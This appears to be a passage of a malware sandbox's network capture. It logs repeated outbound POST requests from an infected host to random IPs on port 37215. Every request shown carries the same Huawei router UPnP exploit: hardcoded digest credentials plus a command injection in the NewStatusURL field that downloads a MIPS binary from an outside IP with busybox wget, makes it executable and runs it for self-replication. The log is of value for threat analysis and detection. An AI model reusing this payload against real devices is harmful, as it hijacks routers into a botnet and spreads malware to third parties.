                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  303192.168.2.1355810157.254.252.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098265886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  304192.168.2.1359964157.167.54.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098289013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  305192.168.2.1354826154.10.239.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098680019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  306192.168.2.1334400157.255.64.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098684072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  307192.168.2.135946675.215.42.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098707914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  308192.168.2.1338486157.217.239.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098709106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  309192.168.2.1344324113.107.163.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098754883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  310192.168.2.1351064157.194.0.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098772049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  311192.168.2.1351414157.72.53.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098772049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  312192.168.2.135364644.186.120.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098831892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 